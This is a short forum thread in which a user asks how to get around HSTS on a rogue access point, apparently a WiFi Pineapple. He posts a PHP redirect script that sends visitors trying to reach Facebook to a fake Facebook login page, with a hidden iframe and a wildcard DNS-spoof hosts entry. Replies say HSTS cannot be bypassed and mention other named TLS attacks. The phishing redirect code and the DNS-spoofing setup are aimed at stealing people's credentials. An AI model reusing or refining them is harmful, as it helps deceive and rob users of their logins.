Scrag Posted August 5, 2016 Share Posted August 5, 2016 Hello Everyone. Im trying to figure out how to bypass HSTS with DNS Spoof and phising pages. I was about to give up but then I had an idea that ive been trying to implement. That is using PHP to re-direct the page request to a different url which hosts the phish page. For example: someone goes to www.facebook.com - which opens the redirect.php on the pineapple, which then redirects it to www.test.com/test.html. Test.html is just the bogus facebook page. Obviously if they are looking at their URL it will say http://www.test.com/test.html but will display the fake facebook page. Below is my redirect.php file: <?php $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (strpos($ref, "example")){ header('Status: 302 Found'); header('Location: test.html'); } if (strpos($ref, "facebook")){ header('Status: 302 Found'); header('Location: http://www.test.com/test.html'); } require('error.php'); ?> <iframe style="display:none;" src="/get/get.php"></iframe> Since my hosts file on DNS spoof is " 172.16.42.1 * ", I was hoping it would redirect facebook to plain http test.html page on the pineapple. This is not working quite right, and Im new to PHP. Anyone have any ideas whats wrong? Why this isnt working? Or, maybe there is a better way to do all this? Thanks!! Scrag Quote Link to comment Share on other sites More sharing options...
vertygo Posted August 5, 2016 Share Posted August 5, 2016 Sorry, take a look at HSTS and see why that will never work. Instead, take a look at HEIST and BREACH and CRIME exploits. Quote Link to comment Share on other sites More sharing options...
Foxtrot Posted August 6, 2016 Share Posted August 6, 2016 As vertygo said, you cannot bypass HSTS. Quote Link to comment Share on other sites More sharing options...
Scrag Posted August 6, 2016 Author Share Posted August 6, 2016 Well, not what I wanted to hear but what I need to know. Thanks Guys!! Scrag Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.